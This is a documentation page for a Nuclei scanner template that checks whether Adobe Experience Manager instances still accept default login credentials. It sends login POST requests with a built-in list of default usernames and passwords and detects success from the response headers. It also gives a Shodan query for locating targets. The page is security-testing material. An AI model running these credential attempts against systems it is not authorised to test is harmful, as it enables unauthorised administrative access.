Adobe AEM Default Login
ID: aem-default-login
Severity: high
Author: random-robbie
Tags: aem,default-login,adobe
Description
Section titled “Description”Adobe AEM default login credentials were discovered.
YAML Source
Section titled “YAML Source”id: aem-default-login
info: name: Adobe AEM Default Login author: random-robbie severity: high description: Adobe AEM default login credentials were discovered. reference: - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 shodan-query: http.component:"Adobe Experience Manager" product: experience_manager vendor: adobe tags: aem,default-login,adobe
http: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}}/libs/granite/core/content/login.html
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
attack: pitchfork payloads: aem_user: - admin - grios - replication-receiver - vgnadmin - author - anonymous aem_pass: - admin - password - replication-receiver - vgnadmin - author - anonymous - jdoe - aparker stop-at-first-match: true
matchers-condition: and matchers: - type: status status: - 200
- type: word part: header words: - login-token - crx.default condition: and# digest: 490a0046304402200a1b385e9cceb671454d7c83c221f78b567e022ac25fc0ce8c8e253990df8fba022003d3b71eff6d9ee5f7fc2273dbf71939953267f5e99c52347839b089d76ad91f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/aem/aem-default-login.yaml"